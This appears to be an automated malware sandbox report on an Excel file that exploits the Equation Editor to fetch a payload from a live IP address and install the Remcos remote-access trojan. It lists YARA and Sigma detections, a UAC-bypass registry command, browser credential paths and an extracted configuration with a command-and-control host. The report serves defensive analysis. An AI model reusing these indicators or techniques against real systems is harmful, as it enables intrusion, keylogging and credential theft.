15.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
15.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
6.2.deblaterate.exe.720000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.deblaterate.exe.720000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.deblaterate.exe.720000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
6.2.deblaterate.exe.720000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
6.2.deblaterate.exe.720000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
14.2.deblaterate.exe.1070000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.deblaterate.exe.1070000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.deblaterate.exe.1070000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
14.2.deblaterate.exe.1070000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
14.2.deblaterate.exe.1070000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
7.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
7.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
7.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Click to see the 35 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.94.54.101, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1012, TargetFilename: C:\Users\user\AppData\Roaming\CKK.exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1012, Protocol: tcp, SourceIp: 23.94.54.101, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1012, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 3052, ProcessName: CKK.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CKK.exe, NewProcessName: C:\Users\user\AppData\Roaming\CKK.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CKK.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1012, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 3052, ProcessName: CKK.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 1864, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 2008, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 1812, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 1864, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1812, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ParentImage: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ParentProcessId: 2008, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\CKK.exe", ProcessId: 1812, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\silvexes\deblaterate.exe, ProcessId: 2008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: FD 44 4B 36 AE 9C E0 16 26 19 F5 A2 D6 C2 5C 1C 3F 2E 1E 22 74 EF 03 FE 4E CA 0A C8 28 C8 02 76 CE D4 34 45 AE BE CC E8 6F 0D CB 89 C3 D6 7F 35 0B 71 0A 11 71 35 61 80 1D 1C F9 6D 0A C2 5C 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\svchost.exe, ProcessId: 1812, TargetObject: HKEY_CURRENT_USER\Software\Rmc-E70NOS\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 202404294766578200.xlam.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://23.94.54.101/GVV.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: 7.2.svchost.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: http://23.94.54.101/GVV.exe

Virustotal: Detection: 15%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\CKK.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\CKK.exe	Virustotal: Detection: 64%			Perma Link

Multi AV Scanner detection for submitted file

Source: 202404294766578200.xlam.xlsx	ReversingLabs: Detection: 68%
Source: 202404294766578200.xlam.xlsx	Virustotal: Detection: 59%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CKK.exe	Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

7_2_00433837

Source: deblaterate.exe, 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_ac7aaa67-d

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.94.54.101 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CKK.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CKK.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_004074FD _wcslen,CoGetObject,

7_2_004074FD

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: deblaterate.exe, 00000006.00000003.800399276.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000006.00000003.800711700.0000000002C30000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828579271.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.828375124.0000000002AC0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	3_2_00A5DBBE
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A2C2A2 FindFirstFileExW,	3_2_00A2C2A2
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A668EE FindFirstFileW,FindClose,	3_2_00A668EE
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	3_2_00A6698F
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00A5D076
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00A5D3A9
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00A69642
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00A6979D
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	3_2_00A69B2B
Source: C:\Users\user\AppData\Roaming\CKK.exe	Code function: 3_2_00A65C97 FindFirstFileW,FindNextFileW,FindClose,	3_2_00A65C97
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00DADBBE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00D7C2A2 FindFirstFileExW,	6_2_00D7C2A2
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB68EE FindFirstFileW,FindClose,	6_2_00DB68EE
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	6_2_00DB698F
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00DAD076
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00DAD3A9
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00DB9642
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00DB979D
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	6_2_00DB9B2B
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe	Code function: 6_2_00DB5C97 FindFirstFileW,FindNextFileW,FindClose,	6_2_00DB5C97
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00409253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	7_2_0041C291
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	7_2_0040C34D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_00409665
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044E879 FindFirstFileExA,	7_2_0044E879
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	7_2_0040880C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040783C FindFirstFileW,FindNextFileW,	7_2_0040783C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_00419AF5
